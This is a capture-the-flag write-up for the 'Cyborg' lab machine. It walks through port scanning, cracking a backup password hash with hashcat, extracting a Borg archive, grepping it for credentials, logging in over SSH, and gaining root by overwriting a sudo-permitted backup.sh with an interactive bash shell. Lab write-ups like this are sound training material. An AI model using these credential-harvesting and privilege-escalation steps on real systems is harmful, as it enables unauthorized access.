Post

Cyborg

Cyborg

Cyborg

Pasted image 20260616095557.png

πŸ” Initial Scan & Hash Cracking

πŸ•΅οΈ First, I performed an nmap scan: Pasted image 20260616100116.png

πŸ’» It returned some interesting ports, so I fetched the hash:

1
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

Then, I cracked it using Hashcat:

1
hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Pasted image 20260616102726.png

πŸ“‚ Extracting the Borg Backup

πŸ’‘ I downloaded archive.tar and extracted it. Inside, I found a folder and a README file. It was a backup created using BorgBackup.

DOc - https://borgbackup.readthedocs.io/en/stable/quickstart.html

Pasted image 20260616102055.png

⚑ Next, I listed the backup contents:

1
borg list ./final_archive

Pasted image 20260616102422.png As you can see, it listed the backup using the password we cracked. Then:

1
borg extract ./final_archive::music_archive

Pasted image 20260616102803.png

πŸ•΅οΈ Internal Reconnaissance

πŸ“Œ It extracted a home folder. Let’s explore:

1
rg -I "password|passwd|api_key|secret|token|ssh-rsa" ./

I searched for credentials inside the extracted backup folder: Pasted image 20260616103603.png

πŸ”‘ I viewed the credentials using cat and used them to SSH in as user alex: Pasted image 20260616103643.png

🚩 We can find the user flag in user.txt: Pasted image 20260616103729.png Pasted image 20260616103821.png

⚑ Privilege Escalation

πŸ› οΈ Running sudo -l shows we have root privileges to run backup.sh: Pasted image 20260616104013.png

Since we have write privileges or can make it writable, let’s add write permissions first:

1
chmod +w /etc/mp3backups/backup.sh

Then, we can overwrite it to escalate privileges:

1
echo "exec /bin/bash -i" | tee /etc/mp3backups/backup.sh

And run it with sudo:

1
sudo /etc/mp3backups/backup.sh

Pasted image 20260616104521.png

Now we can read the root flag: Pasted image 20260616104801.png

This post is licensed under CC BY 4.0 by the author.